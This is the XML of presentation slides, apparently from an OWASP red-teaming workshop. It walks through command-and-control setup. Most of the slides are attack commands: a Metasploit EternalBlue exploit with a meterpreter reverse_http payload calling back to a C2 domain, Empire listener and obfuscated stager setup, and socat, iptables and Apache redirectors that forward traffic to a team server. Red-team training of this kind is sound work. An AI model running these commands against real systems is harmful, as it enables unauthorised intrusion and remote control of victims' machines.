          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0" err="1"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0"/>
              <a:t>/ms17_010_eternalblue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0"/>
              <a:t>msf5 &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2100" dirty="0" err="1"/>
              <a:t>reverse_http</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; set RHOST 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; set RPORT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>…… 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msf5 &gt; set LHOST c2.0wasp.dk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; set LPORT 80</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; set LURI update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>OverrideRequestHost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ReverseListenerBindAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 0.0.0.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ReverseListenerBindPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SessionCommunicationTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ExitOnSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>msf5 &gt; exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3952698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9FC803-71D2-E244-B7AA-1EDA33C93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da-DK" dirty="0"/>
              <a:t>Empire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0623EC1-93C0-4F4C-B0C3-AD056D590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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>clone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/EmpireProject/Empire.git</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>cd Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>setup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>install.sh</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>./empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3836290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9FC803-71D2-E244-B7AA-1EDA33C93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da-DK" dirty="0"/>
              <a:t>Empire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>listener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0623EC1-93C0-4F4C-B0C3-AD056D590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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>listeners</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>uselistener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t> http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; set Name 0waspHTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; set Host http://c2.0wasp.dk:80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>BindIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 0.0.0.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; set Port 5000</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>back</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3768351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9FC803-71D2-E244-B7AA-1EDA33C93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da-DK" dirty="0"/>
              <a:t>Empire stager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0623EC1-93C0-4F4C-B0C3-AD056D590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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>usestager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1"/>
              <a:t>launcher</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0"/>
              <a:t>Generates a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1"/>
              <a:t>one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0"/>
              <a:t>-liner stage0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0" err="1"/>
              <a:t>launcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" dirty="0"/>
              <a:t> for Empire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; set Obfuscate true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SafeChecks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; set Listener 0waspHTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Empire) &gt; execute</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Billede 4" descr="Et billede, der indeholder grøn, bord&#10;&#10;Automatisk genereret beskrivelse">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6BF19E8-F3BF-9B4F-B959-08BCDBB34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88903"/>
            <a:ext cx="9144000" cy="1754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62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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0"/>
              <a:t>C2 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>socat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>redirector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>)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E8DE3DF-FBB6-0746-9698-49EE833FB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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>root@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>socat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> TCP4-LISTEN:80,fork TCP4:[team-server-IP]:80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1080216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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0"/>
              <a:t>C2 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>redirector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>)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E8DE3DF-FBB6-0746-9698-49EE833FB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096022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> -I INPUT -p tcp -m tcp --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> 80 -j ACCEPT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> -t nat -A PREROUTING -p tcp --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> 80 -j DNAT --to-destination [team-server-IP]:80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> -t nat -A POSTROUTING -j MASQUERADE </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> -I FORWARD -j ACCEPT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> -P FORWARD ACCEPT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>root@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> net.ipv4.ip_forward=1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845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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0"/>
              <a:t>C2 (apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>redirector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>)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E8DE3DF-FBB6-0746-9698-49EE833FB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096022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da-DK" dirty="0" err="1"/>
              <a:t>root@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>nano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/apache2/sites-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/000-default-ssl.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Enable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> the Proxy Engine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>SSLProxyEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> On </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t># Tell the Proxy Engine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> to forward </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>ProxyPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[team-server-IP]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>:443/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>ProxyPassReverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[team-server-IP]:443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="da-DK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t># Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>Cert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>checking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>you're</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>self-signed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>cert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>SSLProxyCheckPeerCN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>SSLProxyCheckPeerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>SSLProxyCheckPeerExpire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>off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747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2756DC-D91B-FC43-A0B9-A08C7ECE7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Agenda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405242E-9089-314E-ABF5-36B280FB8C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a-DK" sz="2000" dirty="0"/>
              <a:t>15h00 - 16h59: Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>teaming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0"/>
              <a:t>17h00 - 20h30: OWASP Meeting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1504969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AD6945-488A-9847-A900-457549EFB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da-DK" dirty="0"/>
              <a:t>C2 (apache </a:t>
            </a:r>
            <a:r>
